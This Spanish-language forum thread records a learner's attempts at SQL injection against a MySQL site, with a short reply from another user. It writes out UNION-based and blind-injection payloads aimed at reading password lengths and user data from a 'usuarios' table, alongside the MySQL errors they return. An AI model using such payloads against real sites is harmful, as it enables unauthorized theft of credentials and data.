trato de pensarrrrr xD,dios como quema esto, eso si estoy aprendiendo no sabeis cuanto. no hay nada mejor como pensar jaja

si la sentencia es
select nombre from <inyeccion> order by hoy DESC LIMIT 0, 4

en el momento que meto un AND la cosa peta. pero si meto UNION si puedo meterle cosas.

si pongo en la inyeccion:
order by hoy DESC LIMIT 0, 4 /*
funciona y se ven los resultados

si pudiese meter AND pondria
AND (SELECT length(pass) FROM usuarios where usuario=invitado) = 8
asi comprobaria que la contraseña tiene 8 caracteres (i n v i t a d o)

pero como hago esto si cada vez que meto un AND peta?uf!

si meto      order by hoy DESC LIMIT 0, 4 AND 1=1 /*

dice
MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'and 1=1 /* order by hoy DESC LIMIT 0, 4' at line 1


y si no puedo meter and, como compruebo esto:
 (SELECT length(pass) FROM usuarios where usuario=invitado) = 8

o lo que necesite comprobar?

si esque me falta mucho sql por saber. menos mal que el año que viene tendre una asginatura sobre ello.bueno ahora hare unas cuantas pruebas

eso no siempre se puede hacer azielito .. solo en sistemas no-mysql

Regresa:


De hecho es muy raro que se pueda, requires que el sistema encargado de hacer las consultas separe las queries individualmente antes de hacer las peticiones.

huelo la miel pero no puedo tocarla.

cada vez que meto un parentesis me da un error, por ejemplo intento dar con el numero de entradas que tiene la tabla usuarios de esta manera
UNION SELECT MIN(usuario),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios WHERE (SELECT Count(*) FROM usuarios) < 1000 /*

y me da este error

MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT Count(*) FROM usuarios) < 1000 /* order by hoy DESC LIMI

siempre que meto un parentesis antes de un select para hacer la comprobacion me da error. que estoy haciendo mal?

lo intento hacer como en el manual de blind sql inyection de ka0x

 PDF  --->   http://www.milw0rm.com/papers/197

esto esta mal?
WHERE (SELECT Count(*) FROM usuarios) < 1000 /*

obranueva UNION SELECT database(),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --
lo de database() no lo entiendo. que se supone que tengo que meter ahi? el nombre de el campo??
es decir:
obranueva UNION SELECT usuario(),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --
asi?

al meter el -1 me da error sera que tengo que cerrar un parentesis o algo de la primera consulta?

como quedaria lo del char?
CHAR(40) SELECT length(pass) FROM usuarios where usuario=invitado CHAR(41)

da error

MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT length(pass) FROM usuarios where usuario=invitado CHAR(4

algo pasa con la primera consulta, yo normalmente no la termino y no me muestra nada, pero no me da error,, ahora estoy intentando terminarla y luego añadir algo mas para que asi se muestre el contenido.

si pongo
obranueva order by hoy DESC LIMIT 0, 4 /* se ve el contenido perfectamente

pero si pongo
obranueva order by hoy DESC LIMIT 0, 4

obranueva order by hoy DESC LIMIT 0, 4 UNION SELECT usuario,1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --

me dice MySQL Error: Wrong usage of UNION and ORDER BY
¿?¿?¿?